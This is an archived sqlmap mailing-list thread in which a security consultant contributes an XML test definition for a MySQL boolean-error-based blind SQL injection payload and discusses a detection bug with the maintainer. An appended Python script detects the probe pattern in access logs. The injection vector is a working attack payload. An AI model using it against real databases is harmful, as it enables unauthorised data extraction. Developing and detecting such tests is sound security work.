Hi Miroslav,

On 10.06.2013 12:22, Miroslav Stampar wrote:
> Hi Sebastian.
>
> There was indeed a bug [1]. Find it fixed now.

And it's working, thanks!

> If you would like to contribute this payload we could include it into
> sqlmap :)

With pleasure! It should be working with (at least) MySQL, I haven't verified it in PostgreSQL. It *is* working in WHERE, SELECT before FROM and ORDER BY, not tested for other locations. Quite possibly similar 'syntax errors' can be found for other locations/dbms.

The "" are needed, because sqlmap will convert '' into 0x, which will not throw an error.

Kind regards,
Sebastian Nerz

>
> Kind regards,
> Miroslav Stampar
>
> [1] https://github.com/sqlmapproject/sqlmap/issues/462
>
>
> On Mon, Jun 10, 2013 at 11:30 AM, Sebastian Nerz
> <sebastian.n...@syss.de> wrote:
>
>> Hi there,
>>
>> I wrote a small payload, to test for conditional error-based
>> SQL-injection possibilities:
>>
>> <!-- Boolean-error-based blind tests - WHERE/HAVING clause -->
>> <test>
>>     <title>AND boolean-error-based blind - WHERE or HAVING clause (MySQL)</title>
>>     <stype>1</stype>
>>     <level>1</level>
>>     <risk>1</risk>
>>     <clause>1</clause>
>>     <where>1</where>
>>     <vector>REGEXP IF([INFERENCE],1,"")</vector>
>>     <request>
>>         <payload>REGEXP IF([RANDNUM]=[RANDNUM],1,"")</payload>
>>     </request>
>>     <response>
>>         <comparison>REGEXP IF([RANDNUM]=[RANDNUM1],1,"")</comparison>
>>     </response>
>>     <details>
>>         <dbms>MySQL</dbms>
>>     </details>
>> </test>
>>
>>
>> Theoretically it is working - as long as the server is actually
>> returning content, the injection is detected and works just fine (feel
>> free to add it to the sqlmap repository, if it is correct :) ). But as
>> soon as the tested URL is returning an empty page, detection fails.
>>
>> * With a TRUE request, the server returns a content-length of 0
>> * With a FALSE request, the server returns the error message
>>
>> Now ... for my understanding, this is quite a difference, but SQLMAP
>> fails to recognize it, even with "not-string" given. The problem might
>> be that the server returns a warning during the dynamic-check as well.
>> Is it possible to forbid the usage of ' during this test?
>>
>> What am I doing wrong? Is there an error in the payload above? Can
>> sqlmap handle empty pages?
>>
>> Thanks!
>>
>> Kind regards,
>>
>> Sebastian Nerz
>> --
>> Sebastian Nerz
>> Dipl.-Inform.
>> IT-Security Consultant
>>
>> mailto:sebastian.n...@syss.de
>> ___________________________________________________________
>>
>> SySS GmbH
>> Wohlboldstraße 8
>> 72072 Tübingen
>> Germany
>> Voice: +49 7071 407856-31
>> Fax: +49 7071 407856-19
>> WWW: http://www.syss.de
>>
>> PGP FP: 79DC 2CEC D18D F92F CBB4 AF09 D12D 26A4 9180 FDB2
>>
>> Geschaeftsfuehrer Sebastian Schreiber
>> Registergericht: Amtsgericht Stuttgart / HRB 382420
>> Steuernummer: 86118 / 55809
>>
>>
>> ------------------------------------------------------------------------------
>> How ServiceNow helps IT people transform IT departments:
>> 1. A cloud service to automate IT design, transition and operations
>> 2. Dashboards that offer high-level views of enterprise services
>> 3. A single system of record for all IT processes
>> http://p.sf.net/sfu/servicenow-d2d-j
>> _______________________________________________
>> sqlmap-users mailing list
>> sqlmap-users@lists.sourceforge.net
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>>
>
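The thread describes a probe pair whose TRUE request gets an empty body (content-length 0) and whose FALSE request gets a database error page. From the defender's side that pair is visible in the web server's access log. The following is an added example, not code from the thread or from sqlmap: it parses constructed Common Log Format lines, URL-decodes each query parameter, looks for the `REGEXP IF(<cond>,1,"")` vector shape (also accepting `''` and the `0x...` literal the thread says sqlmap substitutes), and flags any (client, path, parameter) triple that received both an empty and a non-empty response to such probes. The log lines, IPs and paths are constructed sample data.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample access-log lines (not from the thread). Requests 2 and 3
# mimic the TRUE/FALSE probe pair: the TRUE probe returns an empty body, the
# FALSE probe returns a (non-empty) database error page.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Jun/2013:11:30:01 +0200] "GET /item.php?id=1 HTTP/1.1" 200 2048
10.0.0.5 - - [10/Jun/2013:11:30:02 +0200] "GET /item.php?id=1%20REGEXP%20IF(4711%3D4711%2C1%2C%22%22) HTTP/1.1" 200 0
10.0.0.5 - - [10/Jun/2013:11:30:03 +0200] "GET /item.php?id=1%20REGEXP%20IF(4711%3D1234%2C1%2C%22%22) HTTP/1.1" 200 512
10.0.0.9 - - [10/Jun/2013:11:31:00 +0200] "GET /search.php?q=regexp+tutorial HTTP/1.1" 200 7734
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+)'
    r' [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)$')
# Shape of the vector from the thread after URL decoding: REGEXP IF(<cond>,1,"").
# Also accept '' and the 0x... literal sqlmap substitutes for '' (per the thread).
VECTOR_RE = re.compile(
    r'REGEXP\s+IF\s*\(.+?,\s*1\s*,\s*(?:""|\'\'|0x[0-9a-fA-F]*)\s*\)',
    re.IGNORECASE)

def find_probes(log_text):
    """Return one record per request whose query string carries the vector."""
    probes = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in Common Log Format
        parts = urlsplit(m.group("url"))
        # parse_qsl URL-decodes values (%20, %3D, %22 and '+' -> space)
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            if VECTOR_RE.search(value):
                size = 0 if m.group("size") == "-" else int(m.group("size"))
                probes.append({"ip": m.group("ip"), "path": parts.path,
                               "param": name, "value": value, "size": size})
    return probes

def confirmed_pairs(log_text):
    """Flag (ip, path, param) triples that got both an empty-body and a
    non-empty-body response to probes: the TRUE/FALSE pattern from the thread."""
    seen = {}
    for p in find_probes(log_text):
        key = (p["ip"], p["path"], p["param"])
        seen.setdefault(key, set()).add(p["size"] == 0)
    return sorted(k for k, flags in seen.items() if flags == {True, False})

if __name__ == "__main__":
    for key in confirmed_pairs(SAMPLE_LOG):
        print("probe pair seen:", key)
```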